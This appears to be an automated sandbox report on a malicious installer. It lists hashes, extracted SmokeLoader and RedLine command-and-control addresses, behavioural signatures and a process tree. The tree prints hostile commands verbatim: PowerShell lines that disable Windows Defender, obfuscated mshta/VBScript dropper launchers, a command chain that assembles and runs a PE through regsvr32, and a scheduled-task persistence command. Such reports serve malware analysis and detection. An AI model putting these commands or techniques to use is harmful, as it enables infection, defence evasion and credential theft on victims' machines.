Resubmissions
01-11-2021 20:09
211101-yw5kbaafg5 1001-11-2021 07:13
211101-h2lrdsdhhj 1001-11-2021 06:40
211101-hfpk6adhfj 1031-10-2021 18:27
211031-w3r7fsdafj 1031-10-2021 14:10
211031-rgstmscghm 1031-10-2021 08:02
211031-jxchlacefm 1031-10-2021 06:36
211031-hczxqacddp 1031-10-2021 06:23
211031-g5wv4affb3 10Analysis
-
max time kernel
22s -
max time network
1799s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
01-11-2021 20:09
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
4.5MB
-
MD5
3da25ccfa9c258e3ae26854391531c7b
-
SHA1
1ed5613b0ad8ab4c47f07e52199a4edd27be40e6
-
SHA256
62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720
-
SHA512
defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c
Malware Config
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
redline
SomeBody
185.215.113.29:36224
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2536 2360 rundll32.exe 105 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral1/memory/2144-249-0x00000000008A0000-0x00000000008BC000-memory.dmp family_redline behavioral1/memory/2144-250-0x0000000002190000-0x00000000021AB000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral1/files/0x0006000000012206-104.dat family_socelars behavioral1/files/0x0006000000012206-183.dat family_socelars behavioral1/files/0x0006000000012206-162.dat family_socelars -
resource yara_rule behavioral1/files/0x00060000000121f5-71.dat aspack_v212_v242 behavioral1/files/0x00060000000121f4-73.dat aspack_v212_v242 behavioral1/files/0x00060000000121f4-74.dat aspack_v212_v242 behavioral1/files/0x00060000000121f5-72.dat aspack_v212_v242 behavioral1/files/0x00060000000121f7-77.dat aspack_v212_v242 behavioral1/files/0x00060000000121f7-78.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
pid Process 508 setup_installer.exe 1272 setup_install.exe 1656 Sun033e271e0ce96c08.exe 548 Sun03f0dc4460bc9.exe 1596 Sun0324aba28588c0.exe 432 Sun03e4aeb7e43a1c.exe 636 Sun038aa349e3318e.exe 1496 Sun03d477f1a31.exe 1760 Sun03ea09aa5c9686e5.exe 1700 Sun0351a0558292.exe 1728 Sun03f5d51697d04.exe 1932 Sun039750b00c.exe 2004 Sun0328255c4bce6fb.exe 2288 Sun03f5d51697d04.tmp -
Loads dropped DLL 47 IoCs
pid Process 584 setup_x86_x64_install.exe 508 setup_installer.exe 508 setup_installer.exe 508 setup_installer.exe 508 setup_installer.exe 508 setup_installer.exe 508 setup_installer.exe 1272 setup_install.exe 1272 setup_install.exe 1272 setup_install.exe 1272 setup_install.exe 1272 setup_install.exe 1272 setup_install.exe 1272 setup_install.exe 1272 setup_install.exe 1928 cmd.exe 1928 cmd.exe 1940 cmd.exe 1940 cmd.exe 1656 Sun033e271e0ce96c08.exe 1656 Sun033e271e0ce96c08.exe 304 cmd.exe 304 cmd.exe 1172 cmd.exe 1736 cmd.exe 1736 cmd.exe 284 cmd.exe 548 Sun03f0dc4460bc9.exe 548 Sun03f0dc4460bc9.exe 1596 Sun0324aba28588c0.exe 1596 Sun0324aba28588c0.exe 1668 cmd.exe 432 Sun03e4aeb7e43a1c.exe 432 Sun03e4aeb7e43a1c.exe 636 Sun038aa349e3318e.exe 636 Sun038aa349e3318e.exe 1216 cmd.exe 1956 cmd.exe 1888 cmd.exe 1660 cmd.exe 1728 Sun03f5d51697d04.exe 1728 Sun03f5d51697d04.exe 1932 Sun039750b00c.exe 1932 Sun039750b00c.exe 1496 Sun03d477f1a31.exe 1496 Sun03d477f1a31.exe 1728 Sun03f5d51697d04.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 57 freegeoip.app 58 freegeoip.app 60 freegeoip.app 12 ip-api.com 38 ipinfo.io 39 ipinfo.io 55 freegeoip.app -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 2608 1496 WerFault.exe 55 2932 636 WerFault.exe 61 2456 2020 WerFault.exe 110 976 2036 WerFault.exe 119 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun0324aba28588c0.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun0324aba28588c0.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun0324aba28588c0.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 768 schtasks.exe -
Kills process with taskkill 4 IoCs
pid Process 2824 taskkill.exe 2768 taskkill.exe 1084 taskkill.exe 3044 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1596 Sun0324aba28588c0.exe 1596 Sun0324aba28588c0.exe 1404 Process not Found 1404 Process not Found 1404 Process not Found 1404 Process not Found 1404 Process not Found 1404 Process not Found 1404 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1596 Sun0324aba28588c0.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 1496 Sun03d477f1a31.exe Token: SeAssignPrimaryTokenPrivilege 1496 Sun03d477f1a31.exe Token: SeLockMemoryPrivilege 1496 Sun03d477f1a31.exe Token: SeIncreaseQuotaPrivilege 1496 Sun03d477f1a31.exe Token: SeMachineAccountPrivilege 1496 Sun03d477f1a31.exe Token: SeTcbPrivilege 1496 Sun03d477f1a31.exe Token: SeSecurityPrivilege 1496 Sun03d477f1a31.exe Token: SeTakeOwnershipPrivilege 1496 Sun03d477f1a31.exe Token: SeLoadDriverPrivilege 1496 Sun03d477f1a31.exe Token: SeSystemProfilePrivilege 1496 Sun03d477f1a31.exe Token: SeSystemtimePrivilege 1496 Sun03d477f1a31.exe Token: SeProfSingleProcessPrivilege 1496 Sun03d477f1a31.exe Token: SeIncBasePriorityPrivilege 1496 Sun03d477f1a31.exe Token: SeCreatePagefilePrivilege 1496 Sun03d477f1a31.exe Token: SeCreatePermanentPrivilege 1496 Sun03d477f1a31.exe Token: SeBackupPrivilege 1496 Sun03d477f1a31.exe Token: SeRestorePrivilege 1496 Sun03d477f1a31.exe Token: SeShutdownPrivilege 1496 Sun03d477f1a31.exe Token: SeDebugPrivilege 1496 Sun03d477f1a31.exe Token: SeAuditPrivilege 1496 Sun03d477f1a31.exe Token: SeSystemEnvironmentPrivilege 1496 Sun03d477f1a31.exe Token: SeChangeNotifyPrivilege 1496 Sun03d477f1a31.exe Token: SeRemoteShutdownPrivilege 1496 Sun03d477f1a31.exe Token: SeUndockPrivilege 1496 Sun03d477f1a31.exe Token: SeSyncAgentPrivilege 1496 Sun03d477f1a31.exe Token: SeEnableDelegationPrivilege 1496 Sun03d477f1a31.exe Token: SeManageVolumePrivilege 1496 Sun03d477f1a31.exe Token: SeImpersonatePrivilege 1496 Sun03d477f1a31.exe Token: SeCreateGlobalPrivilege 1496 Sun03d477f1a31.exe Token: 31 1496 Sun03d477f1a31.exe Token: 32 1496 Sun03d477f1a31.exe Token: 33 1496 Sun03d477f1a31.exe Token: 34 1496 Sun03d477f1a31.exe Token: 35 1496 Sun03d477f1a31.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 584 wrote to memory of 508 584 setup_x86_x64_install.exe 28 PID 584 wrote to memory of 508 584 setup_x86_x64_install.exe 28 PID 584 wrote to memory of 508 584 setup_x86_x64_install.exe 28 PID 584 wrote to memory of 508 584 setup_x86_x64_install.exe 28 PID 584 wrote to memory of 508 584 setup_x86_x64_install.exe 28 PID 584 wrote to memory of 508 584 setup_x86_x64_install.exe 28 PID 584 wrote to memory of 508 584 setup_x86_x64_install.exe 28 PID 508 wrote to memory of 1272 508 setup_installer.exe 29 PID 508 wrote to memory of 1272 508 setup_installer.exe 29 PID 508 wrote to memory of 1272 508 setup_installer.exe 29 PID 508 wrote to memory of 1272 508 setup_installer.exe 29 PID 508 wrote to memory of 1272 508 setup_installer.exe 29 PID 508 wrote to memory of 1272 508 setup_installer.exe 29 PID 508 wrote to memory of 1272 508 setup_installer.exe 29 PID 1272 wrote to memory of 2036 1272 setup_install.exe 31 PID 1272 wrote to memory of 2036 1272 setup_install.exe 31 PID 1272 wrote to memory of 2036 1272 setup_install.exe 31 PID 1272 wrote to memory of 2036 1272 setup_install.exe 31 PID 1272 wrote to memory of 2036 1272 setup_install.exe 31 PID 1272 wrote to memory of 2036 1272 setup_install.exe 31 PID 1272 wrote to memory of 2036 1272 setup_install.exe 31 PID 1272 wrote to memory of 1552 1272 setup_install.exe 32 PID 1272 wrote to memory of 1552 1272 setup_install.exe 32 PID 1272 wrote to memory of 1552 1272 setup_install.exe 32 PID 1272 wrote to memory of 1552 1272 setup_install.exe 32 PID 1272 wrote to memory of 1552 1272 setup_install.exe 32 PID 1272 wrote to memory of 1552 1272 setup_install.exe 32 PID 1272 wrote to memory of 1552 1272 setup_install.exe 32 PID 1272 wrote to memory of 284 1272 setup_install.exe 34 PID 1272 wrote to memory of 284 1272 setup_install.exe 34 PID 1272 wrote to memory of 284 1272 setup_install.exe 34 PID 1272 wrote to memory of 284 1272 setup_install.exe 34 PID 1272 wrote to memory of 284 1272 setup_install.exe 34 PID 1272 wrote to memory of 284 1272 setup_install.exe 34 PID 1272 wrote to memory of 284 1272 setup_install.exe 34 PID 1272 wrote to memory of 1928 1272 setup_install.exe 33 PID 1272 wrote to memory of 1928 1272 setup_install.exe 33 PID 1272 wrote to memory of 1928 1272 setup_install.exe 33 PID 1272 wrote to memory of 1928 1272 setup_install.exe 33 PID 1272 wrote to memory of 1928 1272 setup_install.exe 33 PID 1272 wrote to memory of 1928 1272 setup_install.exe 33 PID 1272 wrote to memory of 1928 1272 setup_install.exe 33 PID 1272 wrote to memory of 1660 1272 setup_install.exe 35 PID 1272 wrote to memory of 1660 1272 setup_install.exe 35 PID 1272 wrote to memory of 1660 1272 setup_install.exe 35 PID 1272 wrote to memory of 1660 1272 setup_install.exe 35 PID 1272 wrote to memory of 1660 1272 setup_install.exe 35 PID 1272 wrote to memory of 1660 1272 setup_install.exe 35 PID 1272 wrote to memory of 1660 1272 setup_install.exe 35 PID 1552 wrote to memory of 1732 1552 cmd.exe 36 PID 1552 wrote to memory of 1732 1552 cmd.exe 36 PID 1552 wrote to memory of 1732 1552 cmd.exe 36 PID 1552 wrote to memory of 1732 1552 cmd.exe 36 PID 1552 wrote to memory of 1732 1552 cmd.exe 36 PID 1552 wrote to memory of 1732 1552 cmd.exe 36 PID 1552 wrote to memory of 1732 1552 cmd.exe 36 PID 1272 wrote to memory of 304 1272 setup_install.exe 37 PID 1272 wrote to memory of 304 1272 setup_install.exe 37 PID 1272 wrote to memory of 304 1272 setup_install.exe 37 PID 1272 wrote to memory of 304 1272 setup_install.exe 37 PID 1272 wrote to memory of 304 1272 setup_install.exe 37 PID 1272 wrote to memory of 304 1272 setup_install.exe 37 PID 1272 wrote to memory of 304 1272 setup_install.exe 37 PID 2036 wrote to memory of 1672 2036 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:508 -
C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone4⤵
- Loads dropped DLL
PID:1928 -
C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun033e271e0ce96c08.exeSun033e271e0ce96c08.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe4⤵
- Loads dropped DLL
PID:284 -
C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03d477f1a31.exeSun03d477f1a31.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1496 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1496 -s 14046⤵
- Program crash
PID:2608
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun039750b00c.exe4⤵
- Loads dropped DLL
PID:1660 -
C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun039750b00c.exeSun039750b00c.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1932 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL").rUn("cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun039750b00c.exe"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if """" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun039750b00c.exe"") do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ))6⤵PID:2404
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe4⤵
- Loads dropped DLL
PID:304 -
C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f0dc4460bc9.exeSun03f0dc4460bc9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:548 -
C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f0dc4460bc9.exeC:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f0dc4460bc9.exe6⤵PID:3028
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe4⤵
- Loads dropped DLL
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03e4aeb7e43a1c.exeSun03e4aeb7e43a1c.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:432 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2748264892.exe"6⤵PID:2684
-
C:\Users\Admin\AppData\Local\Temp\2748264892.exe"C:\Users\Admin\AppData\Local\Temp\2748264892.exe"7⤵PID:2740
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1811167986.exe"6⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\1811167986.exe"C:\Users\Admin\AppData\Local\Temp\1811167986.exe"7⤵PID:2144
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun03e4aeb7e43a1c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03e4aeb7e43a1c.exe" & exit6⤵PID:2280
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe4⤵PID:1904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe4⤵
- Loads dropped DLL
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun0324aba28588c0.exeSun0324aba28588c0.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe4⤵
- Loads dropped DLL
PID:1172 -
C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun038aa349e3318e.exeSun038aa349e3318e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:636 -
C:\Users\Admin\Pictures\Adobe Films\6rtTqxiXxQGxLyfS32No3xpY.exe"C:\Users\Admin\Pictures\Adobe Films\6rtTqxiXxQGxLyfS32No3xpY.exe"6⤵PID:2728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 14606⤵
- Program crash
PID:2932
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0351a0558292.exe4⤵
- Loads dropped DLL
PID:1216 -
C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun0351a0558292.exeSun0351a0558292.exe5⤵
- Executes dropped EXE
PID:1700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe4⤵
- Loads dropped DLL
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03ea09aa5c9686e5.exeSun03ea09aa5c9686e5.exe5⤵
- Executes dropped EXE
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:1560
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:2520
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:1600
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:2344
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:768
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:2352
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵PID:2584
-
C:\Users\Admin\AppData\Roaming\6545311.exe"C:\Users\Admin\AppData\Roaming\6545311.exe"8⤵PID:2444
-
-
C:\Users\Admin\AppData\Roaming\2542301.exe"C:\Users\Admin\AppData\Roaming\2542301.exe"8⤵PID:2072
-
-
C:\Users\Admin\AppData\Roaming\1053634.exe"C:\Users\Admin\AppData\Roaming\1053634.exe"8⤵PID:1956
-
-
C:\Users\Admin\AppData\Roaming\6673776.exe"C:\Users\Admin\AppData\Roaming\6673776.exe"8⤵PID:1992
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵PID:936
-
-
-
C:\Users\Admin\AppData\Roaming\8899013.exe"C:\Users\Admin\AppData\Roaming\8899013.exe"8⤵PID:1644
-
-
C:\Users\Admin\AppData\Roaming\8076700.exe"C:\Users\Admin\AppData\Roaming\8076700.exe"8⤵PID:2624
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:2840
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"7⤵PID:2020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 9528⤵
- Program crash
PID:2456
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵PID:2492
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵PID:844
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:2060
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵PID:1488
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:2148
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:2708
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:2032
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:1084
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"7⤵PID:2248
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵PID:3020
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵PID:2036
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2036 -s 13768⤵
- Program crash
PID:976
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe4⤵
- Loads dropped DLL
PID:1888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe4⤵
- Loads dropped DLL
PID:1956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe4⤵PID:1620
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun0328255c4bce6fb.exeSun0328255c4bce6fb.exe1⤵
- Executes dropped EXE
PID:2004 -
C:\ProgramData\215894.exe"C:\ProgramData\215894.exe"2⤵PID:2528
-
-
C:\ProgramData\7898954.exe"C:\ProgramData\7898954.exe"2⤵PID:2580
-
-
C:\ProgramData\6614673.exe"C:\ProgramData\6614673.exe"2⤵PID:2752
-
-
C:\ProgramData\7969779.exe"C:\ProgramData\7969779.exe"2⤵PID:2464
-
-
C:\ProgramData\786101.exe"C:\ProgramData\786101.exe"2⤵PID:2820
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\ProgramData\786101.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\ProgramData\786101.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )3⤵PID:2524
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\ProgramData\786101.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\ProgramData\786101.exe") do taskkill /im "%~nxT" /f4⤵PID:2040
-
C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExELYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj5⤵PID:2260
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj ""== """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )6⤵PID:1544
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj "== "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f7⤵PID:3008
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl"). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY +JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 ,TRUe ) )6⤵PID:1484
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY+JkOFKWNK.Eo7 +2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S7⤵PID:2688
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵PID:2692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"8⤵PID:2500
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "786101.exe" /f5⤵
- Kills process with taskkill
PID:2768
-
-
-
-
-
C:\ProgramData\5821209.exe"C:\ProgramData\5821209.exe"2⤵PID:2844
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f5d51697d04.exeSun03f5d51697d04.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\is-S4Q91.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-S4Q91.tmp\Sun03f5d51697d04.tmp" /SL5="$30158,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f5d51697d04.exe"2⤵
- Executes dropped EXE
PID:2288 -
